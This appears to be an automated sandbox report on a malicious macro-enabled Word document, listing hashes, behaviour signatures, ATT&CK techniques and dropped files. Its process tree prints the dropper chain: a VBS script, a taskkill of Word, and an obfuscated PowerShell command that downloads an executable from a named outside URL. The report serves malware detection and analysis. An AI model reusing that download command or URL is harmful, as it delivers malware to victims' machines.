Overview

overview

10

Static

static

8

2020_1844777494.docm

windows7_x64

10

2020_1844777494.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    66s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 03:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2020_1844777494.docm

  • Size

    380KB

  • MD5

    bbea719b296b81cb70e294246c9d6eae

  • SHA1

    d79c7c9a0ddc7d3c7d90eb90f47783e999bb7ebd

  • SHA256

    99d22eb3d584f502292d847497713c8db10f7aa9d2b08f5f6da8e690be4f7832

  • SHA512

    40d7d306bfc8fad85f82d7f3fe9b5baec403a953178bf8284043afcb136b2356084151ded8f1e5c75aaa480e30a2aad0235adea09fdf4fffb7341d5890c67d17

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://werfpop.nl/client.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020_1844777494.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\SysWOW64\explorer.exe
      explorer.exe C:\ProgramData\Portes.vbs
      2⤵
      • Process spawned unexpected child process
      PID:1220
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Portes.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:580
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\Game_Lods\Groters.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1396
        • C:\Windows\system32\taskkill.exe
          Taskkill /IM "winword.exe" /F
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1632
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://werfpop.nl/client.exe', 'C:\Game_Lods\Kritos.exe')
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1896
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          4⤵
          • Delays execution with timeout.exe
          PID:2016

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Game_Lods\Groters.cmd
    Filesize

    4KB

    MD5

    0113834f9f390e12db3057891516f47d

    SHA1

    9c7e3a611586726c18f33ca668ce8c8e8ffc2919

    SHA256

    6231b5b04cb2708b8b8446536de8df99391da90bc77449589ab0e5b7660738e6

    SHA512

    0cd634772edb38f33222bc8654257f0959a063fcf5f8cea59d10a4b106746855dfcb974420e3729088e082d71f57e712a17b599ca69b06a0674b531358769fef

    Download Submit
  • C:\ProgramData\Nolewr.vbs
    Filesize

    358B

    MD5

    c16098d503816c750a2b4ce0b179798f

    SHA1

    e0a6368150f802e5ece6558b2693fa4ca8eeb4b8

    SHA256

    8ba6c20c21eb3a74998f53f1f7d8aa1a139a98c7413ce7bcb3052280f75b3f7d

    SHA512

    e3ca2ce1cc04b37b861489dd1fd21575efe261b436bb29eeed8653f0b5558ac902c8c0f7596bbae91b28854946597da5b385d0614edbf1e8755b955bed698929

    Download Submit
  • C:\ProgramData\Portes.vbs
    Filesize

    68KB

    MD5

    633d05bd06f41c9aa4281baa46ce38e4

    SHA1

    056a5a05108edbedde196098e07553c5c201368f

    SHA256

    a478b1ba294dee526fdf1986402d5e387151394525cc5f523026183197672a77

    SHA512

    268f61d20235696295481651ce70c20164ce4a16f6b6ae4b3e14d86f9e2743904db19e05810991f5928e3e82b08a11a9355a18d711309e1eef118047467a3c7a

    Download Submit
  • memory/580-64-0x0000000000000000-mapping.dmp
    Download
  • memory/1220-59-0x0000000000000000-mapping.dmp
    Download
  • memory/1220-61-0x000000006B491000-0x000000006B493000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1396-67-0x0000000000000000-mapping.dmp
    Download
  • memory/1632-69-0x0000000000000000-mapping.dmp
    Download
  • memory/1784-62-0x000007FEFC331000-0x000007FEFC333000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1896-72-0x000007FEF45D0000-0x000007FEF4FF3000-memory.dmp
    Filesize

    10.1MB

    Download
  • memory/1896-70-0x0000000000000000-mapping.dmp
    Download
  • memory/1896-73-0x000007FEF3A70000-0x000007FEF45CD000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/1896-74-0x0000000002914000-0x0000000002917000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1896-75-0x000000001B840000-0x000000001BB3F000-memory.dmp
    Filesize

    3.0MB

    Download
  • memory/1896-76-0x000000000291B000-0x000000000293A000-memory.dmp
    Filesize

    124KB

    Download
  • memory/2008-65-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2008-58-0x00000000716ED000-0x00000000716F8000-memory.dmp
    Filesize

    44KB

    Download
  • memory/2008-57-0x0000000075DB1000-0x0000000075DB3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2008-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2008-54-0x0000000072C81000-0x0000000072C84000-memory.dmp
    Filesize

    12KB

    Download
  • memory/2008-55-0x0000000070701000-0x0000000070703000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2016-77-0x0000000000000000-mapping.dmp
    Download